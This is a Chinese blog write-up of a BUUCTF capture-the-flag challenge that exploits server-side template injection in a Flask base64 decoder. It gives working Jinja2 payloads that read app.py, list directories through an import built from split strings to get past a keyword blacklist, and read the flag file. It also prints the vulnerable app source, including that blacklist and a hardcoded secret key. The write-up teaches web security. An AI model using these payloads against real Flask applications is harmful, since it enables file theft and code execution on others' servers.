2021-08-03

最新推荐文章于 2021-11-10 17:26:45 发布
最新推荐文章于 2021-11-10 17:26:45 发布
阅读量79 收藏
点赞数
分类专栏: BUUCTF Flask 模板注入
原文链接:https://blog.csdn.net/qq_25500649/article/details/118081982
版权
BUUCTF 同时被 3 个专栏收录
60 篇文章 0 订阅
订阅专栏
模板注入
7 篇文章 0 订阅
订阅专栏
Flask
2 篇文章 0 订阅
订阅专栏

知识点:

FLASK SSTI

ssti绕过

pin生成

题目已经提示是flask,直接找一下好注入的地方看看。

页面很简洁,就是一个base64加解密的站点。

输入框应该就是ssti的注入点,不是加密就是解密输入框。

但是一般来说加密框把数据加密,就不会执行代码了,所以应该可以注入的点在解密框。简单的测试一下,输入{{7+7}},加密结果如下。将其解密。

有计算结果出现。说明确实存在ssti注入可用,接下来尝试读取源码来明确具体的waf。

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__'].open('app.py', 'r').read() }}
{% endif %}
{% endfor %}

 上面的代码可以把源码读出,把上面的代码放到一行。

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py', 'r').read() }}{% endif %}{% endfor %}

_=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py', 'r').read() }}{% endif %}{% endfor %}

下面的代码经过了htmldecode。

 
from flask import Flask,render_template_string
from flask import render_template,request,flash,redirect,url_for
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
from flask_bootstrap import Bootstrap
import base64
 
app = Flask(__name__)
app.config['SECRET_KEY'] = 's_e_c_r_e_t_k_e_y'
bootstrap = Bootstrap(app)
 
class NameForm(FlaskForm):
    text = StringField('BASE64加密',validators= [DataRequired()])
    submit = SubmitField('提交')
class NameForm1(FlaskForm):
    text = StringField('BASE64解密',validators= [DataRequired()])
    submit = SubmitField('提交')
 
def waf(str):
    black_list = ["flag","os","system","popen","import","eval","chr","request",
                  "subprocess","commands","socket","hex","base64","*","?"]
    for x in black_list :
        if x in str.lower() :
            return 1
 
 
@app.route('/hint',methods=['GET'])
def hint():
    txt = "失败乃成功之母!!"
    return render_template("hint.html",txt = txt)
 
 
@app.route('/',methods=['POST','GET'])
def encode():
    if request.values.get('text') :
        text = request.values.get("text")
        text_decode = base64.b64encode(text.encode())
        tmp = "结果  :{0}".format(str(text_decode.decode()))
        res =  render_template_string(tmp)
        flash(tmp)
        return redirect(url_for('encode'))
 
    else :
        text = ""
        form = NameForm(text)
        return render_template("index.html",form = form ,method = "加密" ,img = "flask.png")
 
@app.route('/decode',methods=['POST','GET'])
def decode():
    if request.values.get('text') :
        text = request.values.get("text")
        text_decode = base64.b64decode(text.encode())
        tmp = "结果 : {0}".format(text_decode.decode())
        if waf(tmp) :
            flash("no no no !!")
            return redirect(url_for('decode'))
        res =  render_template_string(tmp)
        flash( res )
        return redirect(url_for('decode'))
 
    else :
        text = ""
        form = NameForm1(text)
        return render_template("index.html",form = form, method = "解密" , img = "flask1.png")
 
 
@app.route('/<name>',methods=['GET'])
def not_found(name):
    return render_template("404.html",name = name)
 
if __name__ == '__main__':
    app.run(host="0.0.0.0", port=5000, debug=True)

 可以看到waf过滤的敏感词。我们下面使用listdir方法查看当前目录下的文件。

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}


接下来读取flag。

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read() }}{% endif %}{% endfor %}

 

 

 
 

nigo134
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Microsoft_Third-Party-Notices_Microsoft-Edge-for-iOS_2021-08-03.docx
06-21
【Microsoft Edge for iOS 第三方通知】是微软针对其在iOS平台上的浏览器应用Microsoft Edge发布的一份文档,该文档更新于2021年8月3日。这份文档的主要目的是披露和承认Microsoft Edge在开发和运行过程中所依赖的第...
2021-08-10
weixin_55997091的博客
08-10 379
本日先占位。
2021-03-15
weixin_44902539的博客
03-15 1244
好网站 https://blog.csdn.net/u013317445/article/details/88196373?utm_medium=distribute.pc_relevant.none-task-blog-OPENSEARCH-6.control&dist_request_id=1328641.48931.16157665162059593&depth_1-utm_source=distribute.pc_relevant.none-task-blog-OPENSEARCH-
2021-01-08
weixin_45404781的博客
01-08 919
typedef struct tagCOPYDATASTRUCT { DWORD dwData; //用户自定义字段 DWORD cbData; //数据长度 PVOID lpData; //内容指针 } COPYDATASTRUCT;
CVE-2021-22205——Gitlab 远程命令执行漏洞复现
LiBai'S BLOG
11-10 9064
CVE-2021-22205Vuln Impact影响版本环境Fofa语法漏洞利用脚本反弹ShellEXP Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a .
2021-08-03 uni-app基础教程 路由
时光隧道
08-03 4万+
一、路由 uni-app页面路由为框架统一管理,需要在pages.json里配置每个路由页面的路径和页面样式。类似的小程序在app.json中配置页面路由相同 页面栈 框架以栈的形式管理当前所有页面,当发生路由切换的时候,页面栈的表现如下: 路由方式 页面栈表现 触发时机 初始化 新页面入栈 uni-app:的第一个页面 新页面 新页面入栈 调用API uni.navigateTo ,使用组件 <navigator open-type =“ navigate” />
2021-08-03 uni-app基础教程 样式布局
热门推荐
时光隧道
08-03 5万+
一、样式布局 uni-app 支持的通用 css 单位包括 px、rpx px 即屏幕像素 rpx 即响应式px,一种根据屏幕宽度自适应的动态单位。以750宽的屏幕为基准,750rpx恰好为屏幕宽度。屏幕变宽,rpx 实际显示效果会等比放大。 vue页面支持普通H5单位,但在nvue里不支持: rem 默认根字体大小为 屏幕宽度/20(微信小程序、字节跳动小程序、App、H5) vh viewpoint height,视窗高度,1vh等于视窗高度的1% vw viewpoint width,视窗宽度,
2021-08-03 uni-app基础教程 生命周期
微软MVP Eleven
08-03 4万+
应用生命周期 uni-app 支持如下应用生命周期函数: 函数名 说明 onLaunch 当uni-app初始化完成时触发(局部只触发一次) onShow 当uni-app启动,或从后台进入前台显示 onHide 当uni-app从前台进入后台 onError 当uni-app报错时触发 onUniNViewMessage 对nvue页面发送的数据进行监听,可参考 nvue 向 vue 通讯 onUnhandledRejection 对未处理的 Promise 拒绝事件.
2021-08-03 uni-app基础教程 环境配置
微软MVP Eleven
08-02 4万+
一、环境配置 1.下载HBuilderX 通过HBuilderX可视化界面,HBuilderX内置相关环境,开箱即用,无需配置nodejs 开始之前,开发者需先下载安装如下工具: HBuilderX:官方IDE下载地址 下载App开发版,可开箱即用;如下载标准版,在运行或发行uni-app时,会提示安装uni-app插件,插件下载完成后方可使用。 如使用cli方式创建项目,可直接下载标准版,因为uni-app编译插件被安装到项目下了 2.创建uni-app 在点击工具栏里的文件->新建->项
2021-08-03-用bat脚本实现锁屏
weixin_46032860的博客
08-03 1593
2021-08-03-用bat脚本实现锁屏背景方法 背景 慢慢的自己使用的机器多了,由一个电脑控制多台电脑,可以实现在不同办公场所实现远端控制,但是每次用完需要锁屏需要进行快捷键的选择和锁屏的点击,或者直接Win+L则连主控机都锁屏。 方法 bat一行代码 新建文本文件,修改命名LockWorkStation.bat,双击执行 rundll32.exe user32.dll LockWorkStation ...
2021-08-03 uni-app基础教程 条件编译
时光隧道
08-03 5万+
一、条件编译 条件编译 条件编译是用特殊的注释作为标记,在编译时根据这些特殊的注释,将注释里面的代码编译到不同平台。 写法:以 #ifdef 或 #ifndef 加 %PLATFORM% 开头,以 #endif 结尾。 #ifdef:if defined 仅在某平台存在 #ifndef:if not defined 除了某平台均存在 %PLATFORM%:平台名称 条件编译写法 说明 #ifdef APP-PLUS 需条件编译的代码 #endif 仅出现在 App 平台下的代码 #i
UL 746F-2021-08-03.pdf
02-16
UL746F STANDARD FOR SAFETY Polymeric Materials - Flexible DielectricFilm Materials for Use in Printed WiringBoards and Flexible Materials Interconnect Constructions
Oracle尹达手写笔记(2021-08-03).pdf
08-09
Oracle尹达手写笔记(2021-08-03
Oracle尹达(2021-08-03).docx
08-16
Oracle数据库是全球广泛使用的大型关系型数据库管理系统,由甲骨文公司开发,它以其稳定性、高效性和可扩展性而著名。本节将详细介绍Oracle数据库的基本概念、安装过程、SQL语言的应用以及Oracle的数据类型和权限...
【WordPress插件】2022年最新版完整功能demo+插件v1.1.0 (2021-08-03).zip
04-22
"【WordPress插件】2022年最新版完整功能demo+插件v1.1.0 (2021-08-03) Contentomatic - ""Article Builder"" & ""Article Forge"" Post Generator Plugin for WordPress 呈现 - “文章构建器”和“文章Forge”...
Bmap额外的文件,应用介绍,开放接口文档等
09-01
Bmap额外的文件,应用介绍,开放接口文档等
AutoTorch-0.0.2b20201003-py3-none-any.whl.zip
09-01
AutoTorch-0.0.2b20201003-py3-none-any.whl.zip
弹性力学数值方法:解析法:一维弹性问题的解析解法.docx
09-01
弹性力学数值方法:解析法:一维弹性问题的解析解法.docx
基于springboot的校园商铺管理系统设计与实现.docx
最新发布
09-01
基于springboot的校园商铺管理系统设计与实现.docx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值